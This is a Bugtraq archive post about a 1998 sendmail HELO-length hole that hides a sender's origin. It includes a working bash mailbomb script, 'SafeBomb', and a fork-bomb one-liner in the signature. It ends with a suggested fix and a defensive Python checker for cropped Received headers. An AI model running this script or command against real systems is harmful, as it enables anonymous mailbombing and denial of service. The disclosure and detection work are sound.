Bugtraq mailing list archives
MS Exchange vulnerable. (was: about sendmail 8.8.8 HELO hole)
From: yury () BISTBN COM (Yuri Krichevsky)
Date: Wed, 27 May 1998 21:06:17 +0300
Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too.

--
"BSD code sucks. Of course, everything else sucks far more." - Theo de Raadt (OpenBSD President)
-----Original Message-----
From: Michał Zalewski <lcamtuf () boss staszic waw pl>
To: info () rootshell com <info () rootshell com>
Date: 10 January 1998 12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.

Here's a brief description of the Sendmail (qmail) hole I found recently:

When someone mailbombs you, or tries to send fakemail, spam, etc - sendmail normally attaches the sender's host name and its address to the outgoing message:

--
From spam () flooders net Mon Jan 5 22:08:21 1998
Received: from spammer (marc () math university edu [150.129.84.5]) by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam () flooders net
Message-Id: <3.14159665@pi>

MAILBOOM!!!
--

That's perfect - now you know who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc () math university edu [150.129.84.5])". Nothing easier... But I found a small hole which allows a user to hide their identity and send mails anonymously. The only thing you should do is pass a HELO string longer than approx. 1024 B - the sender's location and other very useful information will be cropped!!! Message headers should become uninteresting. Sometimes the sender may become quite untraceable (but not always, if it's possible to obtain logs from the machine which has been used to send):

--
From spam () flooders net Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam () flooders net
Message-Id: <3.14159665@pi>

MAILBOOM!!! Now guess who am I...
--

Here's a simple example of Sendmail's HELO hole usage.
Note, this script has been written ONLY to show how easy it may be to send fakemails and mailbombs with the cooperation of Sendmail ;) The script is very slow and restricted in many ways, but explains the problem well (note, some non-Berkeley daemons are also affected, probably Qmail?):

-- EXPLOIT CODE --
#!/bin/bash

TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20

echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf () boss staszic waw pl>"
echo

if [ "$4" = "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo
  echo "  msgfile - file to send as a message body"
  echo "  address - address of lucky recipient"
  echo "  server  - outgoing smtp server w/sendmail"
  echo "  sender  - introduce yourself"
  echo
  echo "WARNING: For educational use ONLY. Mailbombing is illegal."
  echo "Think twice BEFORE you use this program in any way. Also,"
  echo "I've never said this program is 100% safe nor bug-free."
  echo
  sleep 1
  exit 0
fi

if [ ! -f $1 ]; then
  echo "Message file not found."
  echo
  exit 0
fi

echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0
while [ -f $1 ]; do
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=SENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  CONNECTED=`ps|grep -c "telnet $3"`
  if [ "$LIMIT" -le "$CONNECTED" ]; then
    while [ "$LIMIT" -le "$CONNECTED" ]; do
      sleep 1
    done
  fi
  if [ "$SENT" -ge "$MAX" ]; then
    echo "It's just an example, sorry."
    echo
    exit 0
  fi
done
-- EOF --

Suggested fix: insert an additional length limit into the HELO/EHLO parameter scanning routine OR disable AllowBogusHELO (but it may cause serious troubles). I have no 8.8.8 sources at the time, so excuse me if it's unclear.

PS:
--
From: Gregory Neil Shapiro <sendmail+gshapiro () sendmail org>
I was able to reproduce the header problem by lengthening the HELO string in your script. [...] This will be fixed in sendmail 8.9.
--

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
To iterate is human, to recurse divine [P. Deutsch]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
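The cropping described in the thread turns the forensic clue in a Received: header (the peer's verified address in brackets, added by the receiving MTA) into its absence. Below is an added example, not from this thread and not sendmail's code: a small Python checker that unfolds Received: headers and flags any whose HELO argument is longer than a hostname can legally be (255 octets, RFC 1035), or that lacks the bracketed peer address and the "by <host>" clause. The two sample headers are constructed, modelled on the normal and the cropped message quoted above; the function and constant names are my own.

```python
import re
from typing import Dict, List

# Constructed sample headers (modelled on the two messages quoted in the post).
NORMAL_RECEIVED = (
    "Received: from spammer (marc@math.university.edu [150.129.84.5])\n"
    "\tby myhost.com (8.8.8/8.8.8) with SMTP id WAA00376\n"
    "\tfor lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100"
)
CROPPED_RECEIVED = "Received: from " + "x" * 1100   # oversized HELO, rest cropped

# A DNS name cannot exceed 255 octets (RFC 1035), so a longer HELO argument
# is never a real hostname.
MAX_HOSTNAME_LEN = 255

# Dotted-quad address literal as an MTA writes it: [a.b.c.d]
IP_LITERAL = re.compile(r"\[(?:\d{1,3}\.){3}\d{1,3}\]")


def unfold(header: str) -> str:
    """Join RFC 822 folded continuation lines into one logical header line."""
    return re.sub(r"\r?\n[ \t]+", " ", header).strip()


def check_received(header: str) -> Dict[str, object]:
    """Inspect one Received: header and list the reasons it looks cropped.

    Returns helo (the HELO argument), helo_len, reasons (list of strings)
    and suspicious (True when any reason was recorded).
    """
    line = unfold(header)
    m = re.match(r"Received:\s*from\s+(\S+)(.*)$", line, re.IGNORECASE | re.DOTALL)
    if not m:
        # e.g. "Received: by ..." for local submission; nothing to judge here.
        return {"helo": None, "helo_len": 0, "reasons": [], "suspicious": False}
    helo, rest = m.group(1), m.group(2)
    reasons: List[str] = []
    if len(helo) > MAX_HOSTNAME_LEN:
        reasons.append(f"HELO argument is {len(helo)} chars, longer than any hostname")
    if not IP_LITERAL.search(rest):
        reasons.append("no verified peer address [a.b.c.d] after the HELO name")
    if not re.search(r"\bby\s+\S+", rest, re.IGNORECASE):
        reasons.append("no 'by <host>' clause; header appears truncated")
    return {"helo": helo, "helo_len": len(helo), "reasons": reasons,
            "suspicious": bool(reasons)}


def scan_headers(raw_headers: str) -> List[Dict[str, object]]:
    """Split a raw header block into headers and check every Received: line."""
    # A new header starts at a line that does not begin with whitespace.
    headers = re.split(r"\r?\n(?![ \t])", raw_headers.strip())
    return [check_received(h) for h in headers if h.lower().startswith("received:")]


if __name__ == "__main__":
    # Constructed header block: one cropped hop on top of one normal hop.
    sample = "\n".join(["From: spam@flooders.net", CROPPED_RECEIVED,
                        NORMAL_RECEIVED, "Subject: MAILBOOM"])
    for i, result in enumerate(scan_headers(sample), 1):
        status = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"hop {i}: helo_len={result['helo_len']} {status}")
        for reason in result["reasons"]:
            print(f"    - {reason}")
```

Running the block on the constructed sample reports the cropped hop with all three reasons and passes the normal one. In practice the check belongs at the receiving MTA or in a log pipeline: a hop whose Received: line carries no bracketed peer address is a hop whose origin you can no longer establish from the message alone, which is exactly what the author of the post is pointing out.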